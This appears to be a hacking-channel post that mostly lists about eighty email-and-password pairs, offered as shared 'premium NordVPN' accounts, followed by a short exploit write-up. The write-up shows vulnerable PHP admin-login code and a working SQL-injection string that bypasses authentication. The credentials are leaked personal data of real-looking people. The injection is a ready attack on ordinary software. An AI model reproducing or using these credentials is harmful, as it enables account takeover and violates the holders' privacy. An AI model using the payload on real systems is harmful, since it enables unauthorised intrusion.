cyco855@gmail.com:Evi1ives | @UNdercodeTesting Expires at: 2021/07/05
addisongilbert0616@gmail.com:Scotch2001 | @UNdercodeTesting Expires at: 2023/05/14
ingar1610@hotmail.com:ringo123 | @UNdercodeTesting Expires at: 2020/09/14
arjunmakam@gmail.com:Patankus1 | @UNdercodeTesting Expires at: 2022/07/21
eallwright@hotmail.com:Mamiya30 | @UNdercodeTesting Expires at: 2021/04/01
perrysteven1988@live.com:Timmy.0726 | @UNdercodeTesting Expires at: 2021/04/22
shivjijameel@gmail.com:Jameel123 | @UNdercodeTesting Expires at: 2020/12/03
bkhope@hotmail.co.uk:Oscar2802 | @UNdercodeTesting Expires at: 2020/09/08
jameshalcott@hotmail.com:M1r@cles1 | @UNdercodeTesting Expires at: 2020/06/08
h.tutla@live.com:Micheal1 | @UNdercodeTesting Expires at: 2022/08/05
centurionev7@gmail.com:36mbadahood | @UNdercodeTesting Expires at: 2020/05/21
jaakor3@gmail.com:Vinico101 | @UNdercodeTesting Expires at: 2021/01/09
waynetangtf@gmail.com:tszfung1990 | @UNdercodeTesting Expires at: 2023/03/01
arpracci@gmail.com:Sachiko527 | @UNdercodeTesting Expires at: 2022/08/10
saik4ever@live.se:Saik1978 | @UNdercodeTesting Expires at: 2024/05/30
rvschaijk9@hotmail.com:BLurite12 | @UNdercodeTesting Expires at: 2021/03/21
markus@holstad1.com:Mamaluigi123 | @UNdercodeTesting Expires at: 2022/08/28
rehnke@googlemail.com:Stomper98 | @UNdercodeTesting Expires at: 2020/05/21
youngmaestro@gmail.com:eddie1224 | @UNdercodeTesting Expires at: 2022/10/19
xboxkl@yahoo.com:120284Kl | @UNdercodeTesting Expires at: 2022/10/01
elseyenrique@yahoo.com:Goldenchild1 | @UNdercodeTesting Expires at: 2021/06/08
whahappand@msn.com:TWM131270 | @UNdercodeTesting Expires at: 2021/04/15
ryanbeard1@gmail.com:panth3r7 | @UNdercodeTesting Expires at: 2020/06/07
firemanpine@gmail.com:LaRr23St | @UNdercodeTesting Expires at: 2021/12/30
jack_lu_85@yahoo.com:jack1985 | @UNdercodeTesting Expires at: 2020/09/16
evanmp1@hotmail.com:Soccer1717 | @UNdercodeTesting Expires at: 2023/03/23
pimpzon9@gmail.com:Opsbray1! | @UNdercodeTesting Expires at: 2022/08/17
siripanexanah@gmail.com:Khamlaos69 | @UNdercodeTesting Expires at: 2023/02/15
buruzagi@hotmail.com:itxita66 | @UNdercodeTesting Expires at: 2020/06/13
simonjrgensen@yahoo.dk:Simon1202 | @UNdercodeTesting Expires at: 2020/06/17
crimoseb@hotmail.fr:Sebastien77 | @UNdercodeTesting Expires at: 2022/04/20
giluzzz@gmail.com:Shiibba13 | @UNdercodeTesting Expires at: 2021/02/16
drkhikari@gmail.com:Pikachu025! | @UNdercodeTesting Expires at: 2022/10/26
warchief743@yahoo.com:Playon12 | @UNdercodeTesting Expires at: 2020/11/04
dylanrayius@gmail.com:Jackass91 | @UNdercodeTesting Expires at: 2020/06/05
benmaxwell47@gmail.com:maxwell47 | @UNdercodeTesting Expires at: 2020/05/29
rexkw64@gmail.com:Brechan4 | @UNdercodeTesting Expires at: 2021/12/23
andreas@italgrafmedia.se:Slemmigt4877 | @UNdercodeTesting Expires at: 2020/12/17
zackmaguire9@gmail.com:Arlo1976 | @UNdercodeTesting Expires at: 2020/06/13
salvador.1@live.com:Chavita1! | @UNdercodeTesting Expires at: 2021/01/05
jorn.nygaard@me.com:Galant2301 | @UNdercodeTesting Expires at: 2022/07/09
shao_4@gmx.net:Mgfether16 | @UNdercodeTesting Expires at: 2025/04/29
edgarbm95@hotmail.com:412270eb | @UNdercodeTesting Expires at: 2023/03/15
hsfarmar@gmail.com:Awesometastic87 | @UNdercodeTesting Expires at: 2022/05/05
ezekielappoh@yahoo.com:Kwame419 | @UNdercodeTesting Expires at: 2022/02/27
leigh.cable@gmail.com:9812remote | @UNdercodeTesting Expires at: 2022/05/17
alexmorin68@outlook.com:Akin0720 | @UNdercodeTesting Expires at: 2023/05/02
telliott22@gmail.com:Chandler22 | @UNdercodeTesting Expires at: 2022/08/17
hprates016@gmail.com:presunto1 | @UNdercodeTesting Expires at: 2022/11/12
rickylampton@gmail.com:Frederick1 | @UNdercodeTesting Expires at: 2020/11/10
sambhassall@googlemail.com:Ihewmm123 | @UNdercodeTesting Expires at: 2020/06/19
zachklynch@gmail.com:3226Hunter | @UNdercodeTesting Expires at: 2020/11/23
hariscausevic97@gmail.com:Jesus3174 | @UNdercodeTesting Expires at: 2021/11/25
hungrysoul@ymail.com:badboys123 | @UNdercodeTesting Expires at: 2020/06/11
hedstrompa@hotmail.se:R5eu2q3d | @UNdercodeTesting Expires at: 2023/01/13
kristof.das@telenet.be:kejjsk1808 | @UNdercodeTesting Expires at: 2020/11/22
oscarqh69@hotmail.com:Hamza6969 | @UNdercodeTesting Expires at: 2021/03/23
ckegan1998@outlook.com:Silver2017 | @UNdercodeTesting Expires at: 2020/05/22
ikemaster123@gmail.com:Highjump2@ | @UNdercodeTesting Expires at: 2021/02/02
shane.hoyle3@googlemail.com:nissan93 | @UNdercodeTesting Expires at: 2023/02/26
hugosbnarciso@gmail.com:kripto390466 | @UNdercodeTesting Expires at: 2020/06/01
skinobie@gmail.com:gotham42 | @UNdercodeTesting Expires at: 2022/05/20
odusseusadow@gmail.com:Catamaran92 | @UNdercodeTesting Expires at: 2020/09/16
ilemuss@gmail.com:Ivan6237582 | @UNdercodeTesting Expires at: 2020/06/01
cole@cuttingedgediamond.com:cole7341 | @UNdercodeTesting Expires at: 2021/08/15
gokcenkul@gmail.com:Gokcen93 | @UNdercodeTesting Expires at: 2022/01/09
erin.something@outlook.com:PQfmqs48 | @UNdercodeTesting Expires at: 2020/10/26
simardk@gmail.com:flames89 | @UNdercodeTesting Expires at: 2021/01/14
daleftw@yahoo.com:BigDaddy1 | @UNdercodeTesting Expires at: 2020/07/14
strahd_13@hotmail.com:Azalin13 | @UNdercodeTesting Expires at: 2022/10/02
tyishanbanks@gmail.com:alaina08 | @UNdercodeTesting Expires at: 2020/05/30
fabyan.grace@gmail.com:Buckeyes1! | @UNdercodeTesting Expires at: 2020/06/18
henryn85@yahoo.com:Livenlearn1 | @UNdercodeTesting Expires at: 2021/12/08
brett.syndercombe@gmail.com:1Supposes | @UNdercodeTesting Expires at: 2020/06/17
sburnz@gmail.com:jackass1 | @UNdercodeTesting Expires at: 2022/05/19
steam4team@yahoo.de:Lolipop2 | @UNdercodeTesting Expires at: 2021/04/12
pdodd@live.nl:Petraodd12 | @UNdercodeTesting Expires at: 2023/03/01
haydenwoodcox@yahoo.com:Ladiesman217 | @UNdercodeTesting Expires at: 2020/10/25
teemu.ahonen53@gmail.com:Mh816rfu | @UNdercodeTesting Expires at: 2020/05/30
wakdolloui@wanadoo.fr:walawak1 | @UNdercodeTesting Expires at: 2020/06/18
christianoakleaf@gmail.com:wowemu155234 | @UNdercodeTesting Expires at: 2022/09/22



@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘PREMIUM NORDVPN βœ…
send screansoats @UndercodeOfficial After logins to share more accounts
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘2020 BUG : User Management System 2.0 - Authentication BypasS :βœ…VERIFIED BY Undercode :


1- Vulnerable code is here (admin login: /admin/index.php):

<?php
session_start();
include("dbconnection.php");
if(isset($_POST['login']))
{
$adminusername=$_POST['username'];
$pass=md5($_POST['password']);
$ret=mysqli_query($con,"SELECT * FROM admin WHERE
username='$adminusername' and password='$pass'");
$num=mysqli_fetch_array($ret);
if($num>0)
{
$extra="manage-users.php";
$_SESSION['login']=$_POST['username'];
$_SESSION['id']=$num['id'];
echo "<script>window.location.href='".$extra."'</script>";
exit();
}
else
{
$_SESSION['action1']="*Invalid username or password";
$extra="index.php";
echo "<script>window.location.href='".$extra."'</script>";
exit();
}
}

2- We can bypass authentication with SQLi:

Bypass code (user and admin login panel):

Username: pentester' or'1'=1#
Password : pentester' or'1'=1#

Finally: There is a lot of SQLi input in this project. Like, login,
registration, forgot password ...



▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁